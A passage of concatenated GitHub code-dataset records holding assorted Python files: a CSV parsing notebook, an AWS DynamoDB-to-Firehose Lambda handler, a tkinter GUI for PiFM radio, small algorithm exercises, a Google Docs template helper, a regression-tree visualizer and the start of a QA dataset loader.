genfromtxt('stp1.csv', delimiter=',', skip_header = 1, dtype=None)\n# 34 - 42\n# 43 - 51\n# 52 - 60\n# 61 - 70\nprint(raw_data[12,])\ndata = raw_data[11:,]\n\n\n# In[131]:\n\n\ncmd_count = (int(np.unique(raw_data[11:,2])[-1])+1)\ncmd_count\n\n\n# In[137]:\n\n\n\nfind_delay = np.where((data[:,2] == \"0\"))[0]\n\nfor idx in range(len(find_delay)):\n if find_delay[idx] + 1 != 
find_delay[idx+1]:\n delay = find_delay[idx]+1\n break\nprint(delay)\n\n# print(delay)\n# find_repeat = data[:,1]\n# for idx in range(find_repeat):\n# if (find_repeat[idx])\n# print(idx)\n# print(find_repeat)\n\n\n# In[187]:\n\n\n# switch\n# led 24 - 34\n# seg_0 35 - 43\n# seg_1 44 - 52\n# seg_2 53 - 61\n# seg_3 62 - 70\nprint(delay)\n\ncmd_sub_idx = [[24,34], [35, 43], [44, 52], [53, 61], [62, 70]]\noutput_key = [\"led\", \"seg_0\", \"seg_1\", \"seg_2\", \"seg_3\"]\noutput_seg = {\"output\":[]}\ndef cmd_parse1():\n for cmd in range(cmd_count):\n tmp = {}\n if cmd == 0:\n cmd_idx = cmd + 1\n else:\n cmd_idx = cmd * delay\n for sub_idx, key in zip(cmd_sub_idx, output_key):\n tmp[key] = list((data[cmd_idx,sub_idx[0]:sub_idx[1]].astype(int) +1) % 2)\n# tmp[key] = list()[::-1]\n\n# print(tmp[key], end=\"\")\n# if key != \"led\" and tmp[key][-2]:\n# print(\"<-\")\n# else:\n# print()\n if key != \"led\":\n# print(key, end=\" \")\n# print(tmp[key])\n tmp[key].insert(-2, tmp[key][-2])\n tmp[key].insert(-2, tmp[key][-2])\n# print(key, end=\" \")\n# print(tmp[key])\n output_seg[\"output\"].append(tmp)\ncmd_parse1()\nprint(output_seg)\njson.dumps(output_seg, \"\")\n# print(output_seg['output'][0]['led'][::-1])\n# print(output_seg['output'][0]['led'])\n\n\n# In[114]:\n\n\ndef cmd_parse2():\n for cmd in range(cmd_count):\n # data[]\n if cmd == 0:\n cmd_idx = cmd + 1\n else:\n cmd_idx = cmd * delay\n led = data[cmd_idx,sub_idx[0]:sub_idx[1]]\n seg_0 = data[cmd_idx,35:43]\n seg_1 = data[cmd_idx,44:52]\n seg_2 = data[cmd_idx,53:61]\n seg_3 = data[cmd_idx,62:70]\n print(seg_3)\n\n","repo_name":"yutse-chen/vlab","sub_path":"json_test.py","file_name":"json_test.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"12060430024","text":"import json\n\nimport boto3\n\nfrom core_lib.services.database.impl.dynamodb_service import dynamodb_json_to_json\nfrom core_lib.services.parameter.parameter_service import (\n get_parameter_value,\n ParameterName,\n)\nfrom core_lib.utils.lambda_util import lambda_handler\nfrom core_lib.utils.log_util import log_unexpected_exception, log_warning, log_info\nfrom user.user_lifecycle_events import handle_user_event\n\nfirehose = boto3.client(\"firehose\")\nFIREHOSE_DELIVERY_STREAM = None\n\n\ndef get_firehose_delivery_stream():\n global FIREHOSE_DELIVERY_STREAM\n\n if FIREHOSE_DELIVERY_STREAM is None:\n FIREHOSE_DELIVERY_STREAM = get_parameter_value(\n parameter_name=ParameterName.FIREHOSE_DELIVERY_STREAM\n )\n\n return FIREHOSE_DELIVERY_STREAM\n\n\n@lambda_handler()\ndef handle_db_event(event):\n records = event.get(\"Records\", [])\n\n for record in records:\n try:\n db_event = record.get(\"dynamodb\", {})\n event_name = record.get(\"eventName\")\n old_image = dynamodb_json_to_json(db_event.get(\"OldImage\", {}))\n new_image = dynamodb_json_to_json(db_event.get(\"NewImage\", {}))\n entity_type = (\n new_image.get(\"entity_type\")\n if event_name in [\"INSERT\", \"MODIFY\"]\n else old_image.get(\"entity_type\")\n )\n\n if not entity_type:\n log_warning(f\"missing EntityType attribute: {new_image}\")\n continue\n entity_type_handler = ENTITY_TYPES.get(entity_type)\n\n if not entity_type_handler:\n log_warning(f\"missing entity_type_handler for entity: {entity_type}\")\n continue\n\n entity_type_handler(event_name, old_image, new_image)\n\n put_firehose_record(event_name, old_image, new_image)\n\n except Exception as e:\n log_unexpected_exception(e)\n\n\nENTITY_TYPES = {\"user\": 
handle_user_event}\n\n\ndef put_firehose_record(event_name, old_image, new_image):\n    record = new_image if event_name in [\"INSERT\", \"MODIFY\"] else old_image\n\n    if event_name == \"REMOVE\":\n        record[\"is_hard_deleted\"] = True\n\n    delivery_stream_name = get_firehose_delivery_stream()\n    log_info(\n        f\"putting record to firehose delivery stream: {delivery_stream_name} record: {record}\"\n    )\n\n    firehose.put_record(\n        DeliveryStreamName=delivery_stream_name,\n        Record={\"Data\": json.dumps(record)},\n    )\n","repo_name":"ianballard/aws-prod-ready","sub_path":"async/database_event/database_event_handler.py","file_name":"database_event_handler.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"29"}
+{"seq_id":"37507327086","text":"#!/usr/bin/python3.6\n\nimport os\nimport webbrowser\ntry:\n    import tkinter as tk\n    from tkinter import filedialog\n    from tkinter import END\nexcept ImportError:\n    import Tkinter as tk\n    from Tkinter import filedialog\n    from Tkinter import END\n\n\ndef display(a, b=\"Error!\", c='200x100', d=(60, 60)):\n    \"\"\"GUI Message Box\"\"\"\n    def dest(r):\n        r.destroy()\n        return\n\n    root = tk.Tk()\n    root.geometry(c)\n    root.title(b)\n    root.config(background=back_color)\n    msg = tk.Label(root,\n                   text=a,\n                   font=(\"Courier\", 10),\n                   bg=back_color,\n                   highlightthickness=0)\n    butt = tk.Button(root,\n                     text=\"OK\",\n                     width=7,\n                     command=lambda: dest(root),\n                     highlightthickness=0,\n                     bg=fore_color)\n    msg.place(x=25, y=15)\n    butt.place(x=d[0], y=d[1])\n    root.protocol(\"WM_DELETE_WINDOW\", lambda: exit())\n    root.mainloop()\n    return\n\n\ndef play(file_path, freq):\n    \"\"\"Air the given audio file via pifm\"\"\"\n    if file_path == \"\":\n        display(\"No File Selected\")\n    if freq == \"\":\n        display(\"No Frequency Selected\")\n    try:\n        _test = float(freq)\n        del _test\n    except ValueError:\n        display(\"Incorrect Frequency\\nInput\")\n        exit()\n    if (float(low_freq) > float(freq)) or (float(freq) > float(high_freq)):\n        display('Frequency out of\\nrange')\n        exit()\n    try:\n        if file_path.split('/')[-1][-1:-4:-1] == '3pm':  # extension 'mp3', reversed\n            os.system(f\"ffmpeg -i '{file_path}' -f s16le -ar 22.05k -ac 1 - | sudo ./pifm - {freq}\")\n        elif file_path.split('/')[-1][-1:-4:-1] == 'vaw':  # extension 'wav', reversed\n            os.system(f\"sudo ./pifm '{file_path}' {freq} 22050 stereo\")\n        else:\n            display(\"Invalid File Type\")\n            exit()\n    except IOError:  # must come before the broader Exception handler to be reachable\n        display(\"Error in File...Exiting\")\n        exit()\n    except Exception:\n        display(\"Something's Wrong...Exiting\")\n        exit()\n\n\ndef file_dialog(b):\n    \"\"\"GUI File Dialog\"\"\"\n\n    def cls(a):\n        a.destroy()\n        return\n\n    global file_path\n    sel_file_label = tk.Label(b,\n                              text=\"\",\n                              bg=back_color,\n                              highlightthickness=0,\n                              width=20,\n                              )\n    sel_file_label.place(x=20,y=40)\n    b.update()\n    file_path = filedialog.askopenfilename(initialdir=def_dir, title=\"\", filetypes=(\n        ('MP3 Audio File','*.mp3'),('WAV Audio File','*.wav')))\n    try:\n        sel_file_label.config(text=file_path.split('/')[-1])\n    except AttributeError:\n        display('Select a File')\n        exit()\n    b.update()\n\ndef view_info():\n    webbrowser.open('https://www.radioreference.com/apps/db/', 2)\n    return\n\n\ndef settings(_fst=0):\n    \"\"\"GUI Top Menu - Settings\"\"\"\n    def destroy(a):\n        nonlocal _fst\n        if _fst == 1:\n            exit()\n        else:\n            a.destroy()\n\n    def apply(a,b,d,c):\n        nonlocal _fst\n\n        if a == \"\" or a == \"Not Set\":\n            a = \"108.0\"\n        if b == \"\" or b == \"Not Set\":\n            b = \"80.0\"\n        if float(a) <= float(b):\n            c.destroy()\n            display(\"Invalid Range\")\n            exit()\n        if _fst 
== 1:\n with open('settings.conf','w') as fl:\n fl.write('DEFAULT_FREQUENCY=99.9\\n')\n fl.write(f'DEFAULT_DIRECTORY={d}\\n')\n fl.write(f'HIGH_FREQUENCY={a}\\n')\n fl.write(f'LOW_FREQUENCY={b}\\n')\n elif _fst == 0:\n with open('settings.conf','r') as fl:\n data = fl.readline()\n with open('settings.conf','w') as fl:\n fl.write(data)\n fl.write(f'DEFAULT_DIRECTORY={d}\\n')\n fl.write(f'HIGH_FREQUENCY={a}\\n')\n fl.write(f'LOW_FREQUENCY={b}\\n')\n c.destroy()\n return\n \n global high_freq\n global low_freq\n global def_dir\n root = tk.Tk()\n root.title('Settings')\n root.geometry('280x120')\n root.protocol(\"WM_DELETE_WINDOW\", lambda: destroy(root))\n root.config(background=back_color)\n high_label = tk.Label(root,\n text=\"High Frequency-\",\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0)\n low_label = tk.Label(root,\n text=\"Low Frequency-\",\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0)\n high_entry = tk.Entry(root,\n highlightthickness=0,\n width=10)\n low_entry = tk.Entry(root,\n highlightthickness=0,\n width=10\n )\n butt = tk.Button(root,\n text=\"Apply\",\n width=7,\n command=lambda: apply(high_entry.get(),low_entry.get(),def_entry.get(),root),\n highlightthickness=0,\n bg=fore_color,\n )\n def_label = tk.Label(root,\n text=\"Default Directory-\",\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0,\n )\n def_entry = tk.Entry(root,\n highlightthickness=0,\n width=10,\n )\n high_entry.insert(END, high_freq)\n low_entry.insert(END, low_freq)\n def_entry.insert(END, def_dir)\n high_label.place(x=10,y=20)\n low_label.place(x=10,y=40)\n high_entry.place(x=170,y=20)\n low_entry.place(x=170,y=40)\n def_label.place(x=10,y=60)\n def_entry.place(x=170,y=60)\n butt.place(x=95,y=90)\n root.mainloop()\n \ndef about():\n \"\"\"GUI Top Menu - About\"\"\"\n root = tk.Tk()\n root.title(\"About Pi Radio\")\n root.geometry('150x130')\n root.protocol(\"WM_DELETE_WINDOW\", lambda: root.destroy())\n root.config(background=back_color)\n title = tk.Label(root,\n text='Pi Radio',\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0,\n )\n desc = tk.Label(root,\n text='Version: 1.0\\nGUI for PiFM\\nMade by Vignesh',\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0,\n )\n but = tk.Button(root,\n text=\"Contact\",\n command=lambda: webbrowser.open('https://www.github.com/VigneshBurugina',2),\n highlightthickness=0,\n bg=fore_color,\n )\n title.place(x=45, y=10)\n desc.place(x=20,y=30)\n but.place(x=40,y=90)\n root.mainloop()\n \n \ndef main_menu():\n \"\"\"GUI Main Menu\"\"\"\n root = tk.Tk()\n root.title('Pi Radio')\n root.geometry('230x130')\n root.config(background=back_color)\n root.protocol(\"WM_DELETE_WINDOW\", lambda: exit())\n menubar = tk.Menu(root)\n menu1 = tk.Menu(menubar, tearoff=0)\n menu1.add_command(label=\"Frequency Reference\", command=lambda: view_info())\n menu1.add_command(label=\"Exit\", command=lambda: exit())\n menu2 = tk.Menu(menubar, tearoff=0)\n menu2.add_command(label=\"Settings\", command=lambda: settings())\n menu2.add_command(label=\"About\", command=lambda: about())\n menubar.add_cascade(label=\"Menu\", menu=menu1)\n menubar.add_cascade(label=\"Settings\", menu=menu2)\n root.config(menu=menubar)\n file_label = tk.Label(root,\n text='File:',\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0,\n )\n freq_label = tk.Label(root,\n text='Frequency:',\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0,\n )\n file_button = tk.Button(root,\n text='Select',\n width=7,\n 
command=lambda: file_dialog(root),\n highlightthickness=0,\n bg=fore_color,\n )\n freq_entry = tk.Entry(root,\n highlightthickness=0,\n width=10,\n )\n play_button = tk.Button(root,\n text='Play!',\n width=7,\n command=lambda: play(file_path,freq_entry.get()),\n highlightthickness=0,\n bg=fore_color,\n )\n freq_entry.insert(END, def_freq)\n file_label.place(x=20,y=10)\n freq_label.place(x=20,y=70)\n file_button.place(x=120,y=10)\n freq_entry.place(x=120,y=70)\n play_button.place(x=75,y=100)\n root.mainloop()\n \n \nback_color = '#CAE1F4'\nfore_color = '#7ABDE4'\nfile_path = \"\"\n \nif __name__ != '__main__':\n display('Run main.py')\n exit()\n \n\nif 'settings.conf' not in os.listdir():\n display('First Time?\\nSet Settings','Pi Radio')\n high_freq = 'Not Set'\n low_freq = 'Not Set'\n def_dir = 'Not Set'\n settings(1)\n \n_c = 0\nwith open('settings.conf','r') as fl:\n data = fl.readlines()\nfor i in data:\n if \"HIGH_FREQUENCY=\" in i:\n _c += 1\n high_freq = i[15:-1]\n elif \"LOW_FREQUENCY=\" in i:\n _c += 1\n low_freq = i[14:-1]\n elif \"DEFAULT_FREQUENCY=\" in i:\n _c += 1\n def_freq = i[18:-1]\n elif \"DEFAULT_DIRECTORY=\" in i:\n _c += 1\n def_dir = i[18:-1]\n else:\n pass\nif _c != 4:\n display(\"Invalid Config File\")\n exit()\n \n\nmain_menu()\n \n \n ","repo_name":"VigneshBurugina/Pi-Radio","sub_path":"pi_radio.py","file_name":"pi_radio.py","file_ext":"py","file_size_in_byte":10003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"70877450958","text":"# Find maximum product subarray in a given array\n# Given an array of integers, find maximum product subarray.\n# In other words, find a sub-array that has maximum product of its elements.\n# Input: { -6, 4, -5, 8, -10, 0, 8 }\n# Output: The maximum product sub-array is {4, -5, 8, -10} having product 1600\n# Input: { 40, 0, -20, -10 }\n# Output: The maximum product sub-array is {-20, -10} having product 200\n\nfrom typing import List\n\n\ndef findMaximumProductSubArr(arr: List[int]):\n maxEnding = 0\n minEnding = 0\n maxCurrent = 0\n\n for i in range(len(arr)):\n tmp = maxEnding\n maxEnding = max(arr[i], max(arr[i]*maxEnding, arr[i]*minEnding))\n minEnding = min(arr[i], min(arr[i]*tmp, arr[i]*minEnding))\n maxCurrent = max(maxEnding, maxCurrent)\n\n print('The maximum product of a sub-array is', maxCurrent)\n\n\narray = [-6, 4, -5, 8, -10, 0, 8]\narray1 = [40, 0, -20, -10]\narray2 = [-6, 0, 0]\narray3 = [0, 0, 0]\nfindMaximumProductSubArr(array)\n","repo_name":"tdkseraph/algorithm","sub_path":"array/findMaximumProductSubarr.py","file_name":"findMaximumProductSubarr.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"37228613402","text":"import ResolutionManager.environment as env\nfrom ResolutionManager.Repositories.DocumentRepository import DocumentRepository\nfrom ResolutionManager.Repositories.FileRepository import FileRepository\nfrom ResolutionManager.Repositories.ResolutionRepository import ResolutionRepository\nfrom ResolutionManager.API.CredentialsManager import CredentialsManager\nimport sys\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\n\nHEADER_TEMPLATE = \"AS-{resolution_number}-{year}/{committee}\"\n\nclass ResolutionTemplateRepository(object):\n\n def __init__(self, plenary=None, dao=None):\n self.dao = dao\n self.plenary = plenary\n self.doc_repo = DocumentRepository()\n self.file_repo = FileRepository()\n 
self.cred_manager = CredentialsManager()\n self.resolution_repo = ResolutionRepository(dao)\n\n self.service = build('docs', 'v1', credentials=self.cred_manager.creds)\n\n def update_title(self, resolution ):\n # def update_title(self, document_id, title):\n title_idxs = {'start_index': 54, 'end_index': 62}\n rez_number = {'start_index': 54, 'end_index': 62}\n\n title_start = title_idxs['start_index'] - 1\n title_end = title_idxs['start_index'] + len(resolution.title)\n\n\n # Make sure to order backwards so offsets don't change\n requests = [\n {\n 'insertText': {\n 'location': {\n 'index': title_start,\n },\n 'text': resolution.title\n\n }\n },\n\n {\n 'updateTextStyle': {\n 'range': {\n 'startIndex': title_start,\n 'endIndex': title_end\n },\n 'textStyle': {\n 'bold': True,\n },\n 'fields': 'bold,'\n }\n },\n {\n 'updateParagraphStyle': {\n 'range': {\n 'startIndex': title_start,\n 'endIndex': title_end\n },\n 'paragraphStyle': {\n 'alignment': 'CENTER'\n },\n 'fields': 'alignment'\n }\n },\n\n {\n 'deleteContentRange': {\n 'range': {\n 'startIndex': title_end,\n 'endIndex': title_end + 1 + len('[Title]'),\n }\n }},\n\n ]\n\n result = self.service.documents().batchUpdate(\n documentId=resolution.document_id, body={'requests': requests}).execute()\n\n return result\n\n def create_file_from_template(self, resolution, template_id=env.TEMPLATE_DOCUMENT_ID):\n # def create_file_from_template(self, folder_id, resolution_number, resolution_name,\n # template_id=env.TEMPLATE_DOCUMENT_ID):\n \"\"\"Uses the template to make a new resolution in the first readings folder\n returns Resolution object with document id of created resolution set\n \"\"\"\n filename = env.RESOLUTION_FILENAME_TEMPLATE.format(resolution_number=resolution.number,\n resolution_name=resolution.title)\n sys.stdout.write(f\"{resolution.__dict__}\")\n\n resolution.document_id = self.file_repo.copy_file(template_id, filename)\n self.resolution_repo.set_google_document_id(resolution, resolution.document_id)\n\n self.file_repo.move_file_to_folder(resolution.document_id, self.plenary.first_reading_folder_id)\n return resolution\n\n\n def make_header(self, resolution):\n # def make_header(self, resolution_number, year, committee, cosponsors=[]):\n\n # if self.plenary.year > 2000:\n # self.plenary.year = self.plenary.year - 2000\n\n v = HEADER_TEMPLATE.format(resolution_number=resolution.number, year=self.plenary.two_digit_year, committee=resolution.committee.abbreviation)\n if len(resolution.cosponsors) > 0:\n for c in resolution.cosponsors:\n v += f\"/{c.abbreviation}\"\n return v\n\n\n\n def update_header(self, resolution):\n # def update_header(self, document_id, resolution_number, committee, cosponsors=[]):\n txt = f\"{self.make_header(resolution)}\\n{self.plenary.formatted_plenary_date}\"\n # txt = f\"{self.make_header(resolution.number, self.plenary.year, resolution.committee, resolution.cosponsors)}\\n{self.plenary.formatted_plenary_date()}\"\n\n requests = [{\n \"insertText\": {\n \"location\": {\n \"segmentId\": env.TEMPLATE_HEADER_ID,\n \"index\": 0\n },\n \"text\": txt\n }\n }]\n # requests = [\n # {\n # \"createHeader\": {\n # \"sectionBreakLocation\": {\n # \"index\": 0\n # },\n # \"type\": \"DEFAULT\"\n # }\n # },\n # ]\n\n result = self.service.documents().batchUpdate(\n documentId=resolution.document_id, body={'requests': requests}).execute()\n\n 
print(result)\n\n\n","repo_name":"AdamSwenson/ascsu-resolutions-python","sub_path":"ResolutionManager/Repositories/ResolutionTemplateRespository.py","file_name":"ResolutionTemplateRespository.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70440437200","text":"n = int(input())\r\nk = int(input())\r\n\r\nmemo = {}\r\n\r\n# n : slices\r\n# k : ppl\r\ndef solve(n, k):\r\n if (n, k) in memo:\r\n return memo[(n, k)]\r\n \r\n # if # of slices < # of ppl, return 0\r\n # because each person must get at least one slice\r\n if n < k:\r\n return 0 \r\n \r\n # if # of slices == # of ppl or # of ppl == 1, return 1\r\n # if the # of slices == # of ppl, each person gets 1 slice\r\n # if there is only one person, that person gets all the slices\r\n if n == k or k == 1:\r\n return 1\r\n \r\n # otherwise, we can either give each person one slice and continue\r\n # or we can give one person one slice and get rid of them from the line\r\n memo[(n,k)] = solve(n-1, k-1) + solve(n-k, k)\r\n return memo[(n, k)]\r\n\r\nprint(solve(n, k))","repo_name":"brokentelescope/CCC-Solutions","sub_path":"15/CCC '15 J5 - π-day.py","file_name":"CCC '15 J5 - π-day.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"29"} +{"seq_id":"42150909902","text":"from utils.matrix_generator import random_matrix_generator\nfrom commons import print_square_matrix\n\ndef martix_multiply(mat_a, mat_b):\n n = len(mat_a)\n mat_c = [ [ 0 for i in range(n) ] for j in range(n) ]\n for i in range(0, n):\n for j in range(0, n):\n sum = 0\n for k in range(0, n):\n sum += mat_a[i][k] * mat_b[k][j]\n mat_c[i][j] = sum\n return mat_c\n\nif __name__=='__main__':\n n = 4\n max_limit = 100\n mat_a = random_matrix_generator(n, 10)\n mat_b = random_matrix_generator(n, 10)\n mat_c = martix_multiply(mat_a, mat_b)\n print(\"Matrix A\")\n print_square_matrix(mat_a)\n print(\"---------\")\n print(\"Matrix B\")\n print_square_matrix(mat_b)\n print(\"---------\")\n print(\"Result, Matrix C\")\n print_square_matrix(mat_c)\n print(\"---------\")","repo_name":"Niranjan-Ananth/DS-and-Algorithms","sub_path":"CLRS/Chapter4/matrix_multiplication_brute_force.py","file_name":"matrix_multiplication_brute_force.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"31556027485","text":"\"\"\"\nAnimated visualization of how boosted regression tree works\n\"\"\"\nimport numpy as np\n\nfrom vanilla_ml.supervised.regression.decision_tree_regressor import DecisionTreeRegressor\n\n# import matplotlib\n# matplotlib.rcParams[\"animation.convert_path\"] = \"Full path to ImageMagick's convert.exe\"\nimport matplotlib.animation as animation\nimport matplotlib.pyplot as plt\n\nfrom vanilla_ml.supervised.regression.gradient_boosted_regressor import GradientBoostedRegressor\nfrom vanilla_ml.util.metrics.rmse import rmse_score\n\n\ndef viz():\n # Prepare data\n X = np.arange(0, 10, 0.1)\n test_y = X * np.sin(X)\n # e = np.random.normal(0, 1, size=len(X))\n # train_y = test_y + e\n train_y = test_y.copy()\n X = X[:, None]\n print(\"X's shape = %s, train_y's shape = %s, test_y's shape = %s\"\n % (X.shape, train_y.shape, test_y.shape))\n\n # Visualize\n fig, ax = plt.subplots(1, 1, sharex=True, sharey=True, figsize=[7, 7], facecolor='w')\n ani = animation.FuncAnimation(fig, run_boosted_regression_tree, 
range(25),\n fargs=(X, train_y, test_y, ax),\n blit=False, interval=1000, repeat=True)\n plt.show()\n # ani.save('BoostedRegressor.gif', writer='imagemagick')\n\n\ndef run_boosted_regression_tree(i, X, train_y, test_y, ax):\n\n base_regr = DecisionTreeRegressor()\n regr = GradientBoostedRegressor(base_regr, num_rounds=i + 1, alpha=0.1)\n\n print(\"\\n* Iteration = %d\" % (i + 1))\n print(\"Fitting ...\")\n regr.fit(X, train_y)\n\n print(\"Predicting ...\")\n pred_y = regr.predict(X)\n train_rmse = rmse_score(train_y, pred_y)\n test_rmse = rmse_score(test_y, pred_y)\n # print(\"Train RMSE = %g, test RMSE = %g\" % (train_rmse, test_rmse))\n print(\"Train RMSE = %g\" % train_rmse)\n\n ax.cla()\n ax.set_ylim([train_y.min() - 1, train_y.max() + 1])\n ax.plot(X, train_y, 'r')\n ax.plot(X, test_y, 'g')\n ax.plot(X, pred_y, 'b')\n # ax.set_title('Iteration %d, training RMSE = %g, test RMSE = %g' % (i + 1, train_rmse, test_rmse))\n ax.set_title('Iteration %d, training RMSE = %g' % (i + 1, train_rmse))\n\n\nif __name__ == \"__main__\":\n viz()\n","repo_name":"vinhkhuc/VanillaML","sub_path":"vanilla_ml/viz/boosted_regressor_viz.py","file_name":"boosted_regressor_viz.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"29"} +{"seq_id":"18552282273","text":"import json\nimport itertools\nfrom collections import defaultdict, Counter\nimport numpy as np\nfrom nltk import word_tokenize\nimport torch\nfrom torch.utils.data import Dataset\nimport torch.nn.functional as F\nimport torch.nn as nn\n\nimport os\nimport pickle\n\n\ndef preprocess(data):\n \"\"\"\n Args:\n data (str):\n Returns: a list of tokens\n \"\"\"\n tokens = word_tokenize(data)\n return tokens\n\ndef process_data_quail(questions_file_name,key_file_name,save_file_name):\n with open(questions_file_name, 'rb') as f:\n data = json.load(f)\n with open(key_file_name, 'rb') as f:\n labels = json.load(f)\n stitched_data = []\n artical_list = list(data['data'].keys())\n for artical_idx in artical_list:\n artical = data['data'][artical_idx]\n context = artical['context']\n question_list = artical['questions'].keys()\n for quiz_idx in question_list:\n quiz = artical['questions'][quiz_idx]\n q = quiz['question']\n option_0 = quiz['answers']['0']\n option_1 = quiz['answers']['1']\n option_2 = quiz['answers']['2']\n option_3 = quiz['answers']['3']\n label = '<' + labels['data'][quiz_idx] + '>'\n paragraph = preprocess(context)\n q_and_a = [''] + preprocess(q) + ['<0>'] + preprocess(option_0) + \\\n ['<1>'] + preprocess(option_1) + ['<2>'] + preprocess(option_2) + ['<3>'] + preprocess(option_3)\n stitched_data.append([[paragraph,q_and_a],label])\n with open(save_file_name, 'wb') as f:\n pickle.dump(stitched_data, f)\n\ndef process_data_race(data_path, save_file_name):\n stitched_data = []\n for type in ['middle/','high/']:\n new_data_path = data_path + type\n artical_list = os.listdir(new_data_path)\n for artical in artical_list:\n artical_path = new_data_path + artical\n with open(artical_path, 'rb') as f:\n data = json.load(f)\n num_of_q = len(data['answers'])\n parag = data['article']\n parag = preprocess(parag)\n for i in range(num_of_q):\n label = data['answers'][i]\n if label=='A':\n label = '<0>'\n elif label=='B':\n label = '<1>'\n elif label=='C':\n label = '<2>'\n elif label=='D':\n label = '<3>'\n options = data['options'][i]\n question = data['questions'][i]\n option_0 = options[0]\n option_1 = options[1]\n option_2 = options[2]\n option_3 = options[3]\n 
q_and_a = [''] + preprocess(question) + ['<0>'] + preprocess(option_0) + \\\n ['<1>'] + preprocess(option_1) + ['<2>'] + preprocess(option_2) + ['<3>'] + preprocess(\n option_3)\n stitched_data.append([[parag, q_and_a], label])\n with open(save_file_name, 'wb') as f:\n pickle.dump(stitched_data, f)\n\n\n# class Vocabulary:\n# def __init__(self, special_tokens=None):\n# self.w2idx = {}\n# self.idx2w = {}\n# self.w2cnt = defaultdict(int)\n# self.special_tokens = special_tokens\n# if self.special_tokens is not None:\n# self.add_tokens(special_tokens)\n#\n# def add_tokens(self, tokens):\n# for token in tokens:\n# self.add_token(token)\n# self.w2cnt[token] += 1\n#\n# def add_token(self, token):\n# if token not in self.w2idx:\n# cur_len = len(self)\n# self.w2idx[token] = cur_len\n# self.idx2w[cur_len] = token\n#\n# def prune(self, min_cnt=2):\n# to_remove = set([token for token in self.w2idx if self.w2cnt[token] < min_cnt])\n# if self.special_tokens is not None:\n# to_remove = to_remove.difference(set(self.special_tokens))\n# for token in to_remove:\n# self.w2cnt.pop(token)\n# self.w2idx = {token: idx for idx, token in enumerate(self.w2cnt.keys())}\n# self.idx2w = {idx: token for token, idx in self.w2idx.items()}\n#\n# def __contains__(self, item):\n# return item in self.w2idx\n#\n# def __getitem__(self, item):\n# if isinstance(item, str):\n# return self.w2idx[item]\n# elif isinstance(item, int):\n# return self.idx2w[item]\n# else:\n# raise TypeError(\"Supported indices are int and str\")\n#\n# def __len__(self):\n# return (len(self.w2idx))\n\n\nclass Vocabulary:\n def __init__(self, special_tokens=None, glove_path='./data/glove.6B.50d.txt'):\n self.weights_matrix = {}\n self.glove_path = glove_path\n self.glove_dict = self.make_glove_dict()\n self.w2idx = {}\n self.idx2w = {}\n self.w2cnt = defaultdict(int)\n self.special_tokens = special_tokens\n if self.special_tokens is not None:\n self.add_tokens(special_tokens)\n\n def make_glove_dict(self):\n print(\"Loading Glove Model\")\n f = open(self.glove_path, 'r', encoding='utf-8')\n glove_dict = {}\n for line in f:\n splitLine = line.split()\n word = splitLine[0]\n embedding = np.array([float(val) for val in splitLine[1:]])\n glove_dict[word] = embedding\n print(\"Done.\", len(glove_dict), \" words loaded!\")\n return glove_dict\n\n def add_tokens(self, tokens):\n for token in tokens:\n self.add_token(token)\n self.w2cnt[token] += 1\n\n def add_token(self, token):\n if token not in self.w2idx:\n cur_len = len(self)\n self.w2idx[token] = cur_len\n self.idx2w[cur_len] = token\n if token in self.glove_dict:\n self.weights_matrix[cur_len] = self.glove_dict[token]\n else:\n self.weights_matrix[cur_len] = np.random.normal(scale=0.6,size=(50,))\n\n def prune(self, min_cnt=2):\n to_remove = set([token for token in self.w2idx if self.w2cnt[token] < min_cnt])\n if self.special_tokens is not None:\n to_remove = to_remove.difference(set(self.special_tokens))\n for token in to_remove:\n self.w2cnt.pop(token)\n self.w2idx = {token: idx for idx, token in enumerate(self.w2cnt.keys())}\n self.idx2w = {idx: token for token, idx in self.w2idx.items()}\n\n def __contains__(self, item):\n return item in self.w2idx\n\n def __getitem__(self, item):\n if isinstance(item, str):\n return self.w2idx[item]\n elif isinstance(item, int):\n return self.idx2w[item]\n else:\n raise TypeError(\"Supported indices are int and str\")\n\n def __len__(self):\n return (len(self.w2idx))\n\n\ndef transform_weight_mat(weights_matrix):\n # transform the format of weight matrix from 
dictionary to numpy array.\n voc_len = len(weights_matrix)\n new_weights_matrix = np.zeros((voc_len, 50))\n for i in range(voc_len):\n new_weights_matrix[i] = weights_matrix[i]\n return new_weights_matrix\n\n\ndef create_emb_layer(weights_matrix, non_trainable=False):\n num_embeddings, embedding_dim = weights_matrix.shape\n emb_layer = nn.Embedding(num_embeddings, embedding_dim)\n weights_matrix = torch.from_numpy(weights_matrix).type(torch.float32)\n emb_layer.load_state_dict({'weight': weights_matrix})\n if non_trainable:\n emb_layer.weight.requires_grad = False\n return emb_layer, num_embeddings, embedding_dim\n\nclass QADataset(Dataset):\n def __init__(self, texts, labels, vocab=None, labels_vocab=None, parag_max_len=40, q_and_a_max_len=40, lowercase=True):\n \"\"\"\n Args:\n texts (list): tokenized inputs, with format [paragraph, q_and_a]\n labels (list of str): the correponding labels of the dataset examples\n vocab (MyVocabulary, optional): vocabular to convert text to indices. If not provided, will be created based on the 